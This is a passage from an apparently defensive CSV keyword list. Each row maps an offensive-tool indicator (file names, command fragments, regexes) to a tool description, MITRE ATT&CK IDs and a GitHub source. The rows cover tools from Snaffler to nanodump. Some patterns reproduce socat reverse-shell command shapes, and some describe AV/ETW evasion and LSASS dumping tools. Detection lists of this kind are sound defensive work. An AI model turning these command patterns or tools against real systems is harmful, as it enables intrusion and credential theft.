- T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffPoint.exe*",".{0,1000}SnaffPoint\.exe.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*SnaffPoint-main*",".{0,1000}SnaffPoint\-main.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*snallygaster*",".{0,1000}snallygaster.{0,1000}","offensive_tool_keyword","snallygaster","Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.","T1595.001 - T1210","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/hannob/snallygaster","1","0","N/A","N/A","10","2020","231","2024-04-22T11:00:45Z","2018-04-10T12:01:16Z" "*sneaky_gophish*",".{0,1000}sneaky_gophish.{0,1000}","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","10","10","152","44","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z" "*sniff.su/Intercepter-NG*",".{0,1000}sniff\.su\/Intercepter\-NG.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SniffAir*",".{0,1000}SniffAir.{0,1000}","offensive_tool_keyword","SniffAir","SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.","T1530 - T1170 - T1059 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Tylous/SniffAir","1","1","N/A","N/A","10","1170","177","2020-10-14T04:00:27Z","2017-02-20T18:32:32Z" "*sniffer.py*",".{0,1000}sniffer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*sniffer_dump */tmp/*.pcap*",".{0,1000}sniffer_dump\s.{0,1000}\/tmp\/.{0,1000}\.pcap.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*sniffer-master.zip*",".{0,1000}sniffer\-master\.zip.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "*sniffers.llmnr_sniffer*",".{0,1000}sniffers\.llmnr_sniffer.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*SnifferSpoofer*",".{0,1000}SnifferSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*sniffglue*",".{0,1000}sniffglue.{0,1000}","offensive_tool_keyword","sniffglue","Secure multithreaded packet sniffer","T1040 - T1041 - T1046 - T1057 - T1071.001","TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/sniffglue","1","0","N/A","N/A","10","1050","94","2024-01-07T17:13:46Z","2017-09-12T16:26:24Z" "*snmp_default_pass.txt*",".{0,1000}snmp_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*snmpwn *passwords.txt*",".{0,1000}snmpwn\s.{0,1000}passwords\.txt.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*snmpwn.rb* --hosts *",".{0,1000}snmpwn\.rb.{0,1000}\s\-\-hosts\s.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*SOAPHound PoC 1.0.1-beta*",".{0,1000}SOAPHound\sPoC\s1\.0\.1\-beta.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*SOAPHound.exe *",".{0,1000}SOAPHound\.exe\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*SOAPHound.Processors*",".{0,1000}SOAPHound\.Processors.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*socat *",".{0,1000}socat\s.{0,1000}","offensive_tool_keyword","socat","socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file. pipe. 
device","T1048 - T1055 - T1562","TA0003 - TA0002 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/craSH/socat","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""/bin/bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""/bin/sh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""cmd""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""cmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""powershell""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""powershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""pwsh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""pwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""zsh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""zsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:sh*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:sh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:'sh*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\'sh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat tcp4-listen:1337*",".{0,1000}socat\stcp4\-listen\:1337.{0,1000}","offensive_tool_keyword","socat","listening on port 1337 - observed in various malware and PoC exploitation tools","T1049 - T1021.001 - T1572","TA0002 - TA0011 - TA0040","N/A","N/A","C2","N/A","1","0","N/A","8","6","N/A","N/A","N/A","N/A" "*Social Engineer
Toolkit*",".{0,1000}Social\sEngineer\sToolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*social_engineering/web_cloner*",".{0,1000}social_engineering\/web_cloner.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*SocialPwned.git*",".{0,1000}SocialPwned\.git.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*socialpwned.py*",".{0,1000}socialpwned\.py.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*socialpwned_*.txt*",".{0,1000}socialpwned_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*socket.gethostbyname(NO_IP_HOST)*",".{0,1000}socket\.gethostbyname\(NO_IP_HOST\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*SocketHijacking.*",".{0,1000}SocketHijacking\..{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*Socks server for reGeorg HTTP(s) tunneller*",".{0,1000}Socks\sserver\sfor\sreGeorg\sHTTP\(s\)\stunneller.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies 
through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*socks*127.0.0.1 9050*",".{0,1000}socks.{0,1000}127\.0\.0\.1\s9050.{0,1000}","offensive_tool_keyword","proxychains","(TOR default) proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*socks5_exe.exe*",".{0,1000}socks5_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*socks5h://127.0.0.1:9050*",".{0,1000}socks5h\:\/\/127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*--socks5-proxy socks5*",".{0,1000}\-\-socks5\-proxy\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*--socks5-proxyp socks5*",".{0,1000}\-\-socks5\-proxyp\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*--socks5-proxyu socks5*",".{0,1000}\-\-socks5\-proxyu\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*socky whoami*",".{0,1000}socky\swhoami.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","95","16","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*sokaRepo/CoercedPotatoRDLL*",".{0,1000}sokaRepo\/CoercedPotatoRDLL.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*Soledge/BlockEtw*",".{0,1000}Soledge\/BlockEtw.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" 
"*something.wattahog.org*",".{0,1000}something\.wattahog\.org.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*souravbaghz/RadareEye*",".{0,1000}souravbaghz\/RadareEye.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","1","N/A","N/A","4","351","52","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "*source/avetsvc.c*",".{0,1000}source\/avetsvc\.c.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*source/byakugan*",".{0,1000}source\/byakugan.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/dllinject*",".{0,1000}source\/dllinject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/flash_exploiter*",".{0,1000}source\/flash_exploiter.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/javapayload*",".{0,1000}source\/javapayload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/psh_exe*",".{0,1000}source\/psh_exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/shtinkering.*",".{0,1000}source\/shtinkering\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
